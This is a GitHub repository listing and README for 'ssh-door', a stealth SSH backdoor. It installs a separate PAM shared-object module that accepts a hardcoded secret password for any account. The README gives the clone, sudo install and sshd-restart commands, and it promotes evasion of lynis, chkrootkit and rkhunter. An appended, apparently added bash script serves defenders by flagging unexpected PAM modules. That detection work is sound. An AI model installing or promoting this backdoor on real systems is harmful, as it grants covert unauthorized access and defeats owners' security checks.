https://github.com/flashnuke/ssh-door
A stealth SSH backdoor leveraging PAM shared object (.so) injection to bypass authentication and gain SSH access.
- Host: GitHub
- URL: https://github.com/flashnuke/ssh-door
- Owner: flashnuke
- License: gpl-3.0
- Created: 2025-03-06T14:23:05.000Z (about 1 year ago)
- Default Branch: main
- Last Pushed: 2025-03-07T12:19:38.000Z (about 1 year ago)
- Last Synced: 2025-03-25T21:21:24.625Z (about 1 year ago)
- Topics: authentication-bypass, backdoor, cybersecurity, ethical-hacking, linux, linux-security, offensive-security, openssh, pam, pam-authentication, pam-module, pentesting, security, ssh, ssh-backdoor
- Language: Shell
- Homepage:
- Size: 42 KB
- Stars: 2
- Watchers: 1
- Forks: 0
- Open Issues: 0
Metadata Files:
- Readme: README.md
- License: LICENSE
README
```
█████ █████
░░███ ░░███
█████ █████ ░███████ ███████ ██████ ██████ ████████
███░░ ███░░ ░███░░███ ███░░███ ███░░███ ███░░███░░███░░███
░░█████ ░░█████ ░███ ░███ ░███ ░███ ░███ ░███░███ ░███ ░███ ░░░
░░░░███ ░░░░███ ░███ ░███ ░███ ░███ ░███ ░███░███ ░███ ░███
██████ ██████ ████ █████░░████████░░██████ ░░██████ █████
░░░░░░ ░░░░░░ ░░░░ ░░░░░ ░░░░░░░░ ░░░░░░ ░░░░░░ ░░░░░
```
A simple stealth SSH backdoor leveraging PAM shared object (.so) injection to bypass authentication and gain SSH access.
# How it works
This script creates a PAM backdoor by injecting a custom `.so` module that intercepts SSH login attempts. Unlike traditional PAM backdoors that modify existing system files (e.g., `pam_unix.so`), this method creates a separate PAM module, making it less detectable.
When a user attempts to SSH into the system, the injected module captures the password. If the entered password matches the predefined secret password (hardcoded at compile time), authentication is granted regardless of system credentials.
# Usage
```bash
git clone https://github.com/flashnuke/ssh-door.git && cd ssh-door
sudo bash ./install.sh
sudo systemctl restart sshd # or 'sudo service sshd restart' for non-systemd
```
Once the script finishes and the sshd service is restarted, log into the target machine using `ssh <user>@<host>` and enter the predefined password.
### Notes
* Avoids direct modification of system PAM files (`/lib/security/pam_unix.so` remains untouched)
* Passes security checks (`lynis`, `chkrootkit`, `rkhunter`), avoiding common backdoor detection methods
* Does not alter SSH configuration files (e.g., `~/.ssh/authorized_keys`), making it harder to spot
* In rare cases PAM is enabled in `/etc/ssh/sshd_config`
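
For defenders, the first two notes mean that integrity checks on `pam_unix.so` alone are not enough: the modules the SSH PAM stack actually loads have to be enumerated and compared with what is expected. The script below is an added example, not code from the ssh-door repository; the sample stack, the baseline list and the module name `pam_example_unknown.so` are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example: enumerate the modules a PAM stack loads and report any that
# are missing from a known-good baseline. Handles the /etc/pam.d file format.

# pam_modules FILE...: print the unique module field of every PAM rule.
pam_modules() {
  awk '
    NF == 0 || $1 ~ /^#/ { next }          # blank lines and comments
    $1 == "@include"     { next }          # Debian-style include directive
    {
      i = 2                                # $1 = type, $2 = start of control
      if ($i == "include" || $i == "substack") next   # argument is a service name
      if ($i ~ /^\[/) while (i < NF && $i !~ /\]$/) i++   # [k=v ...] spans fields
      if (++i <= NF) print $i
    }' "$@" | sort -u
}

# unexpected_modules BASELINE FILE...: modules referenced but not in BASELINE
# (one module name or path per line).
unexpected_modules() {
  um_baseline=$1; shift
  pam_modules "$@" | grep -vxF -f "$um_baseline" || true
}

# Constructed sample stack and baseline (assumptions, not from a real host).
sample=$(mktemp -d)
cat > "$sample/sshd" <<'EOF'
# /etc/pam.d/sshd (constructed)
auth       optional                    pam_example_unknown.so
@include common-auth
auth       [success=1 default=ignore]  pam_unix.so nullok
account    required                    pam_nologin.so
-session   optional                    pam_systemd.so
session    include                     common-session
EOF
printf '%s\n' pam_unix.so pam_nologin.so pam_systemd.so > "$sample/baseline"

unexpected_modules "$sample/baseline" "$sample/sshd"
```

On a live host, pass `/etc/pam.d/*` and take the baseline from a trusted image of the same distribution release. A hit is then checked with `dpkg -S` or `rpm -qf` on the module file to see whether any installed package owns it.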
### Requirements
* Linux system with PAM-based authentication
* Root access
* SSH service (sshd) running on the target machine
# Disclaimer
This tool is only for testing and can only be used where strict consent has been given. Do not use it for illegal purposes! It is the end user’s responsibility to obey all applicable local, state and federal laws. I assume no liability and am not responsible for any misuse or damage caused by this tool and software.
Distributed under the GNU License.